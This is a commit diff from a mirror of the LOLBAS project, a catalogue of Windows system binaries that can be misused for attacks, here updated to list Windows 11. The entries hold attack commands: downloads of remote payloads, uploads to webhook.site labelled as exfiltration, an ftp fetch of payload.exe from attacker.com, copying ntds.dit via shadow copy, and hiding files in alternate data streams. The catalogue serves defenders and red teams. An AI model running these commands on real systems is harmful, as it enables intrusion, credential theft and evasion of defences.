public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-12-27 07:18:05 +01:00
Code Issues Projects Releases Wiki Activity

Merge pull request #186 from wietze/windows_11_sprint

Browse Source 
Windows 11 sprint
This commit is contained in:
Jose Enrique Hernandez 2022-10-25 13:15:03 -04:00 committed by GitHub
commit 5449be3e95
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
102 changed files with 267 additions and 278 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
yml/OSBinaries/AppInstaller.yml
View File

@ -2,7 +2,7 @@
Name: AppInstaller.exe
Description: Tool used for installation of AppX/MSIX applications on Windows 10
Author: 'Wade Hickey'
Created: '2020-12-02'
Created: 2020-12-02
Commands:
- Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw
Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>
@ -10,7 +10,7 @@ Commands:
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe
Detection:

2
yml/OSBinaries/Aspnet_Compiler.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
- Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

4
yml/OSBinaries/Atbroker.yml
View File

@ -6,11 +6,11 @@ Created: 2018-05-25
Commands:
- Command: ATBroker.exe /start malware
Description: Start a registered Assistive Technology (AT).
Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry.
Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistive Technology (AT) service entry.
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\Atbroker.exe
- Path: C:\Windows\SysWOW64\Atbroker.exe

4
yml/OSBinaries/Bitsadmin.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
Description: Command for copying cmd.exe to another folder
Usecase: Copy file

4
yml/OSBinaries/Certreq.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal
Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST
Usecase: Upload
Category: Upload
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\certreq.exe
- Path: C:\Windows\SysWOW64\certreq.exe

12
yml/OSBinaries/Certutil.yml
View File

@ -10,42 +10,42 @@ Commands:
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Description: Download and save 7zip to disk in the current folder.
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: certutil -encode inputFileName encodedOutputFileName
Description: Command to encode a file using Base64
Usecase: Encode files to evade defensive measures
Category: Encode
Privileges: User
MitreID: T1027
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: certutil -decode encodedInputFileName decodedOutputFileName
Description: Command to decode a Base64 encoded file.
Usecase: Decode files to evade defensive measures
Category: Decode
Privileges: User
MitreID: T1140
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName
Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
Usecase: Decode files to evade defensive measures
Category: Decode
Privileges: User
MitreID: T1140
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\certutil.exe
- Path: C:\Windows\SysWOW64\certutil.exe

4
yml/OSBinaries/Cmd.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: ADS
Privileges: User
MitreID: T1059.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: cmd.exe - < fakefile.doc:payload.bat
Description: Execute payload.bat stored in an Alternate Data Stream (ADS).
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: ADS
Privileges: User
MitreID: T1059.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\cmd.exe
- Path: C:\Windows\SysWOW64\cmd.exe

2
yml/OSBinaries/Cmdkey.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: Credentials
Privileges: User
MitreID: T1078
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\cmdkey.exe
- Path: C:\Windows\SysWOW64\cmdkey.exe

4
yml/OSBinaries/Cmdl32.yml
View File

@ -2,7 +2,7 @@
Name: cmdl32.exe
Description: Microsoft Connection Manager Auto-Download
Author: 'Elliot Killick'
Created: '2021-08-26'
Created: 2021-08-26
Commands:
- Command: cmdl32 /vpn /lan %cd%\config
Description: Download a file from the web address specified in the configuration file. The downloaded file will be in %TMP% under the name VPNXXXX.tmp where "X" denotes a random number or letter.
@ -10,7 +10,7 @@ Commands:
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\cmdl32.exe
- Path: C:\Windows\SysWOW64\cmdl32.exe

2
yml/OSBinaries/Cmstp.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.

2
yml/OSBinaries/ConfigSecurityPolicy.yml
View File

@ -4,7 +4,7 @@ Description: Binary part of Windows Defender. Used to manage settings in Windows
Author: Ialle Teixeira
Created: 2020-09-04
Commands:
- Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
- Command: ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
Description: Upload file, credentials or data exfiltration in general
Usecase: Upload file
Category: Upload

2
yml/OSBinaries/Control.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: ADS
Privileges: User
MitreID: T1218.002
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\control.exe
- Path: C:\Windows\SysWOW64\control.exe

4
yml/OSBinaries/Csc.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: Compile
Privileges: User
MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: csc -target:library File.cs
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to a dll file.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe

4
yml/OSBinaries/Cscript.yml
View File

@ -4,13 +4,13 @@ Description: Binary used to execute scripts in Windows
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
- Command: cscript c:\ads\file.txt:script.vbs
- Command: cscript //e:vbscript c:\ads\file.txt:script.vbs
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\cscript.exe
- Path: C:\Windows\SysWOW64\cscript.exe

4
yml/OSBinaries/DataSvcUtil.yml
View File

@ -2,9 +2,9 @@
Name: DataSvcUtil.exe
Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.
Author: 'Ialle Teixeira'
Created: '01/12/2020'
Created: 2020-12-01
Commands:
- Command: DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile
- Command: DataSvcUtil /out:C:\Windows\System32\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile
Description: Upload file, credentials or data exfiltration in general
Usecase: Upload file
Category: Upload

2
yml/OSBinaries/Desktopimgdownldr.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\desktopimgdownldr.exe
Code_Sample:

2
yml/OSBinaries/Dfsvc.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe

13
yml/OSBinaries/Esentutl.yml
View File

@ -10,42 +10,43 @@ Commands:
Category: Copy
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
Description: Copies the source Alternate Data Stream (ADS) to the destination EXE.
Usecase: Extract hidden file within alternate data streams
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
Description: Copies the source EXE to the destination EXE file
Usecase: Use to copy files from one unc path to another
Category: Download
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
Description: Copies a (locked) file using Volume Shadow Copy
Usecase: Copy/extract a locked file such as the AD Database
Category: Copy
Privileges: Admin
MitreID: T1003.003
OperatingSystem: Windows 10, Windows 2016 Server, Windows 2019 Server
OperatingSystem: Windows 10, Windows 11, Windows 2016 Server, Windows 2019 Server
Full_Path:
- Path: C:\Windows\System32\esentutl.exe
- Path: C:\Windows\SysWOW64\esentutl.exe

6
yml/OSBinaries/Expand.yml
View File

@ -10,21 +10,21 @@ Commands:
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: expand c:\ADS\file1.bat c:\ADS\file2.bat
Description: Copies source file to destination.
Usecase: Copies files from A to B
Category: Copy
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
Description: Copies source file to destination Alternate Data Stream (ADS)
Usecase: Copies files from A to B
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\Expand.exe
- Path: C:\Windows\SysWOW64\Expand.exe

4
yml/OSBinaries/Explorer.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: explorer.exe C:\Windows\System32\notepad.exe
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10 (Tested)
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\explorer.exe
- Path: C:\Windows\SysWOW64\explorer.exe

2
yml/OSBinaries/Extexport.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Program Files\Internet Explorer\Extexport.exe
- Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe

8
yml/OSBinaries/Extrac32.yml
View File

@ -10,28 +10,28 @@ Commands:
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
Usecase: Extract data from cab file and hide it in an alternate data stream.
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
Description: Copy the source file to the destination file and overwrite it.
Usecase: Download file from UNC/WEBDav
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe
Description: Command for copying calc.exe to another folder
Usecase: Copy file
Category: Copy
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\extrac32.exe
- Path: C:\Windows\SysWOW64\extrac32.exe

10
yml/OSBinaries/Findstr.yml
View File

@ -10,28 +10,28 @@ Commands:
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: findstr /S /I cpassword \\sysvol\policies\*.xml
Description: Search for stored password in Group Policy files stored on SYSVOL.
Usecase: Find credentials stored in cpassword attrbute
Category: Credentials
Privileges: User
MitreID: T1552.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe
Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is downloaded to the target file.
Usecase: Download/Copy file from webdav server
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
MitreID: T1185
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\findstr.exe
- Path: C:\Windows\SysWOW64\findstr.exe

2
yml/OSBinaries/FltMC.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: Tamper
Privileges: Admin
MitreID: T1562.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\fltMC.exe
Detection:

4
yml/OSBinaries/Forfiles.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\forfiles.exe
- Path: C:\Windows\SysWOW64\forfiles.exe

4
yml/OSBinaries/Ftp.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
Description: Download
Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\ftp.exe
- Path: C:\Windows\SysWOW64\ftp.exe

4
yml/OSBinaries/Gpscript.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: Execute
Privileges: Administrator
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: Gpscript /startup
Description: Executes startup scripts configured in Group Policy
Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
Category: Execute
Privileges: Administrator
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\gpscript.exe
- Path: C:\Windows\SysWOW64\gpscript.exe

4
yml/OSBinaries/Hh.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: HH.exe c:\windows\system32\calc.exe
Description: Executes calc.exe with HTML Help.
Usecase: Execute process with HH.exe
Category: Execute
Privileges: User
MitreID: T1218.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\hh.exe
- Path: C:\Windows\SysWOW64\hh.exe

4
yml/OSBinaries/IMEWDBLD.yml
View File

@ -2,7 +2,7 @@
Name: IMEWDBLD.exe
Description: Microsoft IME Open Extended Dictionary Module
Author: 'Wade Hickey'
Created: '2020-03-05'
Created: 2020-03-05
Commands:
- Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw
Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>
@ -10,7 +10,7 @@ Commands:
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
Detection:

2
yml/OSBinaries/Ie4uinit.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\ie4uinit.exe
- Path: c:\windows\sysWOW64\ie4uinit.exe

4
yml/OSBinaries/Ilasm.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: Compile
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10,7
OperatingSystem: Windows 7, Windows 10, Windows 11
- Command: ilasm.exe C:\public\test.txt /dll
Description: Binary file used by .NET to compile C#/intermediate (IL) code to dll
Usecase: A description of the usecase
Category: Compile
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10,7
OperatingSystem: Windows 7, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe

4
yml/OSBinaries/Infdefaultinstall.yml
View File

@ -8,9 +8,9 @@ Commands:
Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
Usecase: Code execution
Category: Execute
Privileges: User
Privileges: Admin
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\Infdefaultinstall.exe
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe

4
yml/OSBinaries/Installutil.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Description: Execute the target .NET DLL or EXE.
Usecase: Use to execute code and bypass application whitelisting
Category: Execute
Privileges: User
MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: InstallUtil.exe https://example.com/payload
Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Usecase: Downloads payload from remote server

10
yml/OSBinaries/Jsc.yml
View File

@ -1,23 +1,23 @@
---
Name: Jsc.exe
Description: Binary file used by .NET to compile javascript code to .exe or .dll format
Description: Binary file used by .NET to compile JavaScript code to .exe or .dll format
Author: 'Oddvar Moe'
Created: 2019-05-31
Commands:
- Command: jsc.exe scriptfile.js
Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe.
Description: Use jsc.exe to compile JavaScript code stored in scriptfile.js and output scriptfile.exe.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: jsc.exe /t:library Library.js
Description: Use jsc.exe to compile javascript code stored in Library.js and output Library.dll.
Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
MitreID: T1127
